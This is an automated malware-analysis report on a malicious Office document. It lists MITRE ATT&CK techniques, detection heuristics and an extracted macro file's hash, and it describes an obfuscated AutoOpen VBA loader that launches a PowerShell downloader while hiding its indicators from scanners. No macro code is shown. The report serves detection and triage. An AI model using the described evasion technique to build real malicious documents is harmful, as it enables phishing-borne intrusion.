Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing an AutoOpen VBA macro. This macro is obfuscated and uses CreateObject and Shell calls to execute a second-stage payload. The script attempts to construct and execute a PowerShell command, indicating a downloader or dropper functionality.
Heuristics (8)

- VBA macros detected [medium] OLE_VBA_MACROS (5 related findings): Document contains VBA macro code.
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA.
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro.
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call.
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9696 bytes |

SHA-256 of macros.bas: 196e918f04112ad39e411aaa0f46eca82104254e7b706bddc65f0cf72342121f

Preview script: first 1,000 lines of the extracted script (the report's preview is truncated).